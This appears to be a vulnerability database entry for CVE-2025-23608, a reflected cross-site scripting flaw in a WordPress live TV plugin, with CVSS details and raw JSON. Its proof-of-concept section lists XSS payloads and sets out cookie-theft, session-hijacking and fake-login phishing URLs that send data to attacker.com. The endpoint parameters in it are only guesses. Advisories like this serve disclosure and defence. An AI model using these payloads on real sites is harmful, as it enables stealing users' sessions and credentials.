Security Vulnerability Report
中文
CVE-2025-23608 CVSS 7.1 HIGH

CVE-2025-23608

Published: 2025-12-31 18:15:44
Last Modified: 2026-04-23 15:24:08

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Omar Mohamed Mohamoud LIVE TV live-tv allows Reflected XSS.This issue affects LIVE TV: from n/a through <= 1.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

LIVE TV (WordPress插件) <= 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-23608 Reflected XSS PoC --> <!-- Target: WordPress LIVE TV Plugin <= 1.2 --> <!-- Author: Security Researcher --> <!DOCTYPE html> <html> <head> <title>CVE-2025-23608 PoC</title> </head> <body> <h2>CVE-2025-23608 - LIVE TV Plugin Reflected XSS</h2> <p>Malicious URL to trigger XSS:</p> <code id="maliciousUrl"></code> <p>Click the link below to test (for authorized testing only):</p> <a id="testLink" href="#" target="_blank">Test Link</a> <script> // Generate malicious URL based on common WordPress LIVE TV plugin endpoints const baseUrl = window.location.origin + '/wp-admin/admin-ajax.php'; // Common XSS payloads const payloads = [ '<script>alert("XSS")</script>', '<img src=x onerror=alert("XSS")>', '<svg/onload=alert("XSS")>', '" onmouseover=alert("XSS") "', "<iframe src=javascript:alert('XSS')>" ]; // Example vulnerable parameter (may vary based on actual vulnerable endpoint) const vulnerableParams = [ 'action=live_tv_search', 'live_tv_query', 's', 'search' ]; // Generate test URLs const maliciousUrl = `${baseUrl}?${vulnerableParams[0]}=${encodeURIComponent(payloads[1])}`; document.getElementById('maliciousUrl').textContent = maliciousUrl; document.getElementById('testLink').href = maliciousUrl; // Cookie stealing payload example const cookieStealPayload = `<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>`; console.log('Cookie stealing payload:', cookieStealPayload); </script> <!-- Example attack scenarios --> <pre> Attack Scenarios: 1. Cookie Theft: https://target.com/wp-admin/admin-ajax.php?action=live_tv_search=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> 2. Session Hijacking: https://target.com/?s=<img src=x onerror="this.src='https://attacker.com/log?c='+document.cookie"> 3. Phishing: https://target.com/live-tv/?q=<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><h1>Fake Login</h1><form action="https://attacker.com/phish"><input name="u"><input name="p" type="password"><input type="submit"></form></div> </pre> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23608", "sourceIdentifier": "[email protected]", "published": "2025-12-31T18:15:44.007", "lastModified": "2026-04-23T15:24:08.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Omar Mohamed Mohamoud LIVE TV live-tv allows Reflected XSS.This issue affects LIVE TV: from n/a through <= 1.2."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Omar Mohamed Mohamoud LIVE TV permite XSS Reflejado. Este problema afecta a LIVE TV: desde n/a hasta 1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/live-tv/vulnerability/wordpress-live-tv-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}